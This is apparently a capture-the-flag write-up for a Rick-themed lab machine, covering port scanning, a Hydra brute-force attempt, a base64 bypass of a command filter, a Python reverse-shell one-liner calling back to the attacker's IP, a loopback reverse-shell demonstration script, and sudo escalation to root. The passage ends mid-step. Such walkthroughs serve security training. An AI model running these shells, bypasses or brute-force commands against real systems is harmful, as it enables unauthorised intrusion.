Write-up
Step-by-step guide on the approach taken to pwn the machine.
Objectives
In this machine, we are tasked with finding three specific items: the three ingredients, each stored in a file on the box.
Reconnaissance
As usual, we start by scanning for open ports using nmap:
sudo nmap -F -T5 -sCV <ip_victim>
We discover two open ports:
22 SSH
80 HTTP
Let's start with port 80 by visiting the webpage:
http://<ip_victim>:80
We find a message from Rick asking for help, stating he can't remember his password. Examining the source code with Ctrl+U, we find a username: R1ckRul3s.
Directory and Login Enumeration
To try brute-forcing the SSH password for that user, we run Hydra:
hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://<ip_victim>
However, Hydra reports that the SSH server does not accept password authentication, so we shift our focus to directory enumeration with dirbuster:
dirbuster
The scan reveals /portal.php, which redirects to /login.php. Inspecting /robots.txt, we find a single string that looks like a credential, so we try it as the password.
Using R1ckRul3s as the username and the discovered string as the password, we successfully log in.
Gaining a Shell
Inside the admin panel, we see a terminal for executing commands. Other sections are restricted to "the real Rick."
We start by checking our user context:
whoami
Then we list the files:
ls -la
We find Sup3rS3cretPickl3Ingred.txt. Attempting to read it with cat fails: the panel refuses the command. The check only looks at which program is invoked, so we read the file through base64 instead, encoding it and decoding it again in the same pipeline:
base64 "Sup3rS3cretPickl3Ingred.txt" | base64 --decode
We obtain the first ingredient.
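The bypass works because the panel filters by program name rather than by what the command can do. The following is an added example, not code from the original write-up or from the machine: a model of a denylist-style filter of the kind the panel appears to use (the real list is not shown and is assumed here), beside a hardened allowlist variant. The denylist names, the allowlist names and the commands in the `__main__` block are all constructed for the demonstration.

```python
import shlex

# Constructed for this example: the kind of denylist a web "command panel"
# might apply. The real panel's list is not known from the write-up.
DENYLIST = {"cat", "head", "tail", "more", "less", "nano", "vim"}

# Constructed allowlist for the hardened filter: exact program names only.
ALLOWLIST = {"ls", "whoami", "id", "pwd"}

# Characters that let the caller chain, redirect, substitute or quote.
SHELL_META = set("|;&$`<>(){}\\\"'\n")


def denylist_allows(cmd: str) -> bool:
    """Weak filter: reject only if a banned program name appears as a
    whitespace-separated word.

    This is exactly why `base64 file | base64 --decode` gets through:
    neither word is on the list, yet the pipeline prints the file.
    Redirections such as `less<file` also pass, because the banned name is
    glued to the filename and never matches a whole word.
    """
    return not any(word in DENYLIST for word in cmd.split())


def allowlist_allows(cmd: str) -> bool:
    """Hardened filter: no shell metacharacters or quoting at all, and the
    first token must be a program on the allowlist. The argument vector is
    still produced with shlex so the checked name is the one the shell
    would actually run. This does not make a web-exposed shell safe; it
    shows the difference between denying names and allowing programs."""
    if any(ch in SHELL_META for ch in cmd):
        return False
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quoting, should be unreachable after the check above
        return False
    return bool(argv) and argv[0] in ALLOWLIST


def bypasses(candidates):
    """Return the candidate commands the weak filter lets through."""
    return [c for c in candidates if denylist_allows(c)]


if __name__ == "__main__":
    # Constructed candidates: the blocked command and three ways around the denylist.
    tests = [
        "cat Sup3rS3cretPickl3Ingred.txt",
        "base64 Sup3rS3cretPickl3Ingred.txt | base64 --decode",
        "less<Sup3rS3cretPickl3Ingred.txt",
        "ls -la",
    ]
    for c in tests:
        print(f"{c!r:60} denylist={denylist_allows(c)!s:5} allowlist={allowlist_allows(c)}")
```

The first filter rejects `cat file` but accepts the base64 pipeline and the `less<file` redirection; the second accepts only `ls -la`. A filter that reasons about program names can never enumerate every way of reading a file, which is the general lesson behind this step.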
Next, we want a proper reverse shell for easier interaction. First we check whether Python is available on the target:
python3 --version
With Python 3 present, we use the Python reverse shell one-liner from pentestmonkey, pointed at our IP and the port our listener will use (8888):
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<our_ip>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We set up a listener on our machine:
nc -lnvp 8888
Submitting this command through the panel's command field makes the target connect back to our listener, and we get an interactive shell as the web server user.
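To see what the one-liner actually does, here is an added example that is not part of the original write-up: both ends of the reverse shell running on 127.0.0.1 in one script. The target side hands the socket to /bin/sh as stdin, stdout and stderr, which is what the three os.dup2() calls in the one-liner achieve; the listener side plays the role of `nc -lnvp`. The commands sent across are constructed for the demonstration, and the port is chosen by the kernel rather than fixed at 8888.

```python
import socket
import subprocess
import threading


def reverse_shell(host: str, port: int) -> None:
    """Target side. Connect back to the listener and start /bin/sh with the
    socket as fds 0, 1 and 2. subprocess performs the same dup2() calls the
    pentestmonkey one-liner does by hand, so the shell reads its commands
    from the network and writes results back over it. The one-liner passes
    -i for a prompt; it is omitted here so the stream carries nothing but
    command output."""
    sock = socket.create_connection((host, port))
    subprocess.run(["/bin/sh"], stdin=sock.fileno(), stdout=sock.fileno(),
                   stderr=sock.fileno())
    sock.close()  # the FIN tells the listener the shell has exited


def catch_shell(commands: bytes, timeout: float = 10.0) -> bytes:
    """Attacker side, the equivalent of `nc -lnvp <port>`. Binds an ephemeral
    loopback port, launches the target side in a thread, feeds it `commands`
    and returns everything the shell sends back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))  # port 0: let the kernel pick a free port
    srv.listen(1)
    srv.settimeout(timeout)
    port = srv.getsockname()[1]

    target = threading.Thread(target=reverse_shell,
                              args=("127.0.0.1", port), daemon=True)
    target.start()

    conn, _ = srv.accept()  # the callback from the "victim"
    srv.close()
    conn.settimeout(timeout)  # never block forever if the shell misbehaves
    conn.sendall(commands)
    conn.shutdown(socket.SHUT_WR)  # EOF on the shell's stdin: sh exits after the last command

    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:  # the target closed its end: the shell is gone
            break
        chunks.append(data)
    conn.close()
    target.join(timeout)
    return b"".join(chunks)


if __name__ == "__main__":
    # Constructed command batch for the demonstration.
    print(catch_shell(b"id\nuname -a\n").decode())
```

Because stdin, stdout and stderr are all the same socket, anything the shell prints, including error messages, travels back to the listener, and the connection is plaintext, which is why such shells are trivially visible to anyone watching the wire.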
Privilege Escalation
To check sudo privileges:
sudo -l
We can run /bin/bash as sudo, so we execute:
sudo /bin/bash
We are now root. Root's home directory holds the third ingredient:
cd /root
ls -la
cat 3rd.txt
Finally, we search for the second ingredient in Rick's home directory: